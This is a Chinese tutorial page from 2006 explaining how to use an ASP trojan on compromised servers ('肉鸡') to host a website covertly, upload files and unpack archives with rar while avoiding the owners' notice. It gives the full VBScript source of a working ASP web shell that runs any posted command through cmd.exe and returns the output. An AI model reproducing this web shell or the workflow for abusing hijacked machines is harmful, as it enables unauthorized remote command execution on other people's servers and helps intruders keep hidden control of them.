教程中国
PHOTOSHOP CS9.0中文版 MAYA 8.5 FOR WINDOWS Corel Painter v9.0 Flash MX2004 中文版 Illustrator cs2 中文版
VC++6.0含sp6 中英文版 VB6.0 +sp6 简体中文版 Borland Delphi 7汉化版 MSDN for vb6.0中文版 Visual Studio 2005简体
教程中国下属 文件存储共享专家BIBIDU.COM 提供大型软件,教材,源码,电影,音乐,图书等下载 更多精品请点此进入
  您目前所在位置: 教程中国 >> 编程基地 >> ASP >> 用ASP木马实现FTP和解压缩 RSS订阅
用ASP木马实现FTP和解压缩
教程(视频,书籍)下载:  ASP.NET AutoCAD 数据库 C# ASP java photoshop 网页设计 delphi 3dmax Flash C++ VB 张孝祥 实例   更多请进入BIBIDU搜索
IT搜索引擎   
   我想大家都有一些开了80端口的肉鸡吧,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉.
  
    在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现.
  
    asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序.我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找.最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?这下asp木马用上了.找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下.上传.zip或者.rar文件到该肉鸡的web目录.在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录.
  
    只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
  
    --------以下是asp木马的源码,建议在<html>后加上<% =server.mappath(".") %>------------------------------
  
  <%@ Language=VBScript %>
  <%
   Dim oScript
   Dim oScriptNet
   Dim oFileSys, oFile
   Dim szCMD, szTempFile
   On Error Resume Next
   <
  
    ' -- create the COM objects that we will be using -- '
    Set oScript = Server.createObject("WSCRIPT.SHELL")
    Set oScriptNet = Server.createObject("WSCRIPT.netWORK")
    Set oFileSys = Server.createObject("Scripting.FileSystemObject") <
  
    ' -- check for a command that we have posted -- '
    szCMD = Request.form(".CMD")
    If (szCMD <> "") Then <
  
     ' -- Use a poor man's pipe ... a temp file -- '
     szTempFile = "C:\" & oFileSys.GetTempName( )
     Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
     Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <
  
    End If <
  
  %>
  <HTML>
  <BODY>
   <form action="<%= Request.ServerVariables("URL") %>" method="POST">
    <input type=text name=".CMD" size=45 value="<%= szCMD %>">
    <input type=submit value="Run">
   </form>
  <PRE> <
  
   <%
    If (IsObject(oFile)) Then
     ' -- Read the output from our command and remove the temp file -- '
     On Error Resume Next
     Response.Write Server.HTMLEncode(oFile.ReadAll)
     oFile.Close
     Call oFileSys.deleteFile(szTempFile, True)
    End If
   %>
  </BODY>
  </HTML>
  >

来源:编程技术-十度教育
作者:
关键字:解压缩
发表日期:2006-10-18 10:24:55

网页显示有限 阅读全文请下载本文完整版WORD文档

上一篇:防范ASP木马的十大基本原则   下一篇:在你的ASP中使用类(class)


2009-1-9 1:28:53
本文的相类似文章
  • .bz2文件如何解压缩
  • Linux下的压缩/解压缩工具
  • Linux中文件的压缩与解压缩
  • Linux技巧:bz2文件如何解压缩
  • Linux技巧:bz2文件如何解压缩
  • 菜鸟详听ASP中也能解压缩rar文件
  • 使用Java API压缩和解压缩数据
  • 用ASP木马实现FTP和解压缩
  • 用VB6.0自制压缩与解压缩程序(三)
  • 用VB6.0自制压缩与解压缩程序(一)
  • 在学习中进步 在进步中成长 教程中国相随您的成长之路
    华腾联合科技股份有限公司版权所有
    广告联系:Rosibo@163.com